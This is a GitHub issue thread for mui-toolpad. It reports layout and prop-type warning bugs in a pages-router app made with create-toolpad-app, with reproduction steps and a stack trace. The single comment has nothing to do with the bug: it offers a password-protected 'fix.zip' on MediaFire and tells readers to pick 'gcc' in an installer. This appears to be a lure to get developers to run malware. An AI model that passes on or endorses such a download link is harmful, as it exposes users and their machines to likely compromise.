### ISSUE TITLE
[create-toolpad-app] Issues with pages router app

### ISSUE THREAD

**Issue by Janpot** [mui/mui-toolpad#4005]
### Steps to reproduce

Steps:
1. Run `pnpm create toolpad-app`
2. Type dir `repro`
3. choose pages router
4. choose no authentication
5. `cd repro`
6. `pnpm dev`
7. open application

### Current behavior

* The title and logo are misaligned:
    ![Screenshot 2024-08-28 at 12 32 57](https://github.com/user-attachments/assets/9534c789-8bb2-423d-9431-7263caca7e72)

* There is an error logged in the console:
    ```
    hydration-error-info.js:63 Warning: Failed prop type: The following props are not supported: `documentNode`, `colorSchemeNode`, `disableNestedContext`, `colorSchemeStorageKey`, `modeStorageKey`. Please remove them.
        at ThemeProvider (webpack-internal:///./node_modules/.pnpm/@mui+system@5.16.7_@emotion+react@11.13.3_@types+react@18.3.4_react@18.3.1__@emotion+styled@1_itqvvhqn72zk5isxntjqjwq4yi/node_modules/@mui/system/esm/ThemeProvider/ThemeProvider.js:58:5)
        at ThemeProvider (webpack-internal:///./node_modules/.pnpm/@mui+material@5.16.7_@emotion+react@11.13.3_@types+react@18.3.4_react@18.3.1__@emotion+styled_u54plt3h22lcxai37fz66nmgt4/node_modules/@mui/material/styles/ThemeProvider.js:26:18)
        at LegacyThemeProvider (webpack-internal:///./node_modules/.pnpm/@toolpad+core@0.5.2_@emotion+react@11.13.3_@types+react@18.3.4_react@18.3.1__@emotion+styled@_nvqt2dlcvjyyhbimkqaqd6jpaa/node_modules/@toolpad/core/AppProvider/AppThemeProvider.js:44:5)
        at AppThemeProvider (webpack-internal:///./node_modules/.pnpm/@toolpad+core@0.5.2_@emotion+react@11.13.3_@types+react@18.3.4_react@18.3.1__@emotion+styled@_nvqt2dlcvjyyhbimkqaqd6jpaa/node_modules/@toolpad/core/AppProvider/AppThemeProvider.js:127:5)
        at AppProvider (webpack-internal:///./node_modules/.pnpm/@toolpad+core@0.5.2_@emotion+react@11.13.3_@types+react@18.3.4_react@18.3.1__@emotion+styled@_nvqt2dlcvjyyhbimkqaqd6jpaa/node_modules/@toolpad/core/AppProvider/AppProvider.js:58:5)
        at AppProviderNextPages (webpack-internal:///./node_modules/.pnpm/@toolpad+core@0.5.2_@emotion+react@11.13.3_@types+react@18.3.4_react@18.3.1__@emotion+styled@_nvqt2dlcvjyyhbimkqaqd6jpaa/node_modules/@toolpad/core/nextjs/AppProviderNextPages.js:26:64)
        at AppProvider (webpack-internal:///./node_modules/.pnpm/@toolpad+core@0.5.2_@emotion+react@11.13.3_@types+react@18.3.4_react@18.3.1__@emotion+styled@_nvqt2dlcvjyyhbimkqaqd6jpaa/node_modules/@toolpad/core/nextjs/AppProvider.js:23:81)
        at AppLayout (webpack-internal:///./pages/_app.tsx:76:11)
        at AppCacheProvider (webpack-internal:///./node_modules/.pnpm/@mui+material-nextjs@5.16.6_@emotion+cache@11.13.1_@emotion+server@11.11.0_@mui+material@5.16_gstiav3gveww4whjxphmrxwv5a/node_modules/@mui/material-nextjs/v13-pagesRouter/pagesRouterV13App.js:17:3)
        at App (webpack-internal:///./pages/_app.tsx:112:13)
        at PathnameContextProviderAdapter (webpack-internal:///./node_modules/.pnpm/next@14.2.7_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/shared/lib/router/adapters.js:81:11)
        at ErrorBoundary (webpack-internal:///./node_modules/.pnpm/next@14.2.7_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/client/components/react-dev-overlay/pages/ErrorBoundary.js:41:9)
        at ReactDevOverlay (webpack-internal:///./node_modules/.pnpm/next@14.2.7_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/client/components/react-dev-overlay/pages/ReactDevOverlay.js:33:11)
        at Container (webpack-internal:///./node_modules/.pnpm/next@14.2.7_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/client/index.js:81:1)
        at AppContainer (webpack-internal:///./node_modules/.pnpm/next@14.2.7_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/client/index.js:189:11)
        at Root (webpack-internal:///./node_modules/.pnpm/next@14.2.7_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/client/index.js:413:11)
    ```

### Your environment

<details>
  <summary><code>npx @mui/envinfo</code></summary>

```
  Don't forget to mention which browser you used.
  Output from `npx @mui/envinfo` goes here.
```
</details>

**Search keywords**: create-toolpad-app pages router

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
